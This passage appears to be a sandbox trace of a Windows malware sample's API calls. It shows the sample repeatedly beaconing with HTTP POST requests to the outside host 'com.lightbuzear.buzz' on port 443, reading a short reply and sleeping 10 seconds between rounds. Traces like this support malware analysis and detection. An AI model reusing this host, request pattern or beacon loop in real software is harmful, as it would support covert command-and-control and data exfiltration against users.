Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0205.566] FreeLibrary (hLibModule=0x71780000) returned 1 [0205.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0f0 | out: hHeap=0x4780000) returned 1 [0205.567] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0205.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0205.567] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea90 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0205.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f9a0 [0205.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0205.569] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a050 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb38 [0205.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0205.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed60 [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0205.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0205.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0205.570] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0205.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0205.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0205.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eda8 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed78 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed78 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d58 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a190 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0205.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0205.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0205.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0205.572] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0205.572] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0205.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed48 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed78 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed78 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829fd8 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0205.603] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0205.603] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a028 [0205.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0205.604] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0205.674] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0205.674] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0207.176] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a028 | out: hHeap=0x4780000) returned 1 [0207.176] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0207.177] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0207.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0207.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0207.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0207.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed18 [0207.177] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0207.177] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482edc0 [0207.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed18 | out: hHeap=0x4780000) returned 1 [0207.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0207.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edc0 | out: hHeap=0x4780000) returned 1 [0207.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d08 [0207.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0207.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0207.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d08 | out: hHeap=0x4780000) returned 1 [0207.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0f0 [0207.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0207.178] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e48 [0207.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0207.178] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0207.179] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0207.179] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0207.179] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e48 | out: hHeap=0x4780000) returned 1 [0207.179] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0207.179] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0207.179] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0207.179] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0207.179] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0207.179] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482edc0 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed18 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edc0 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed18 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829e48 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e48 | out: hHeap=0x4780000) returned 1 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e48 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0207.180] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0207.180] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0207.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0207.181] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0207.181] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0207.181] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0207.181] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0207.182] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0207.182] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0207.182] FreeLibrary (hLibModule=0x71570000) returned 1 [0207.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0207.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0207.182] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a050 | out: hHeap=0x4780000) returned 1 [0207.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0207.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0207.183] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f10 | out: hHeap=0x4780000) returned 1 [0207.184] Sleep (dwMilliseconds=0x2710) [0207.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0207.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0207.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0207.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0207.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0207.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0207.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482edc0 [0207.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed18 [0207.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edc0 | out: hHeap=0x4780000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0207.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed18 | out: hHeap=0x4780000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed90 [0207.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d58 [0207.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0207.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0207.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0a0 [0207.212] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482edd8 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed78 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edd8 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0207.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed78 | out: hHeap=0x4780000) returned 1 [0207.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a050 [0207.214] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0207.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0207.214] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a050 | out: hHeap=0x4780000) returned 1 [0207.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f10 [0207.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0207.214] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0207.214] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0207.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0207.215] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0207.215] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0207.215] FreeLibrary (hLibModule=0x71780000) returned 1 [0207.215] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0207.215] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0207.216] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482edc0 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482edd8 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edc0 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0207.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edd8 | out: hHeap=0x4780000) returned 1 [0207.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482edd8 [0207.216] 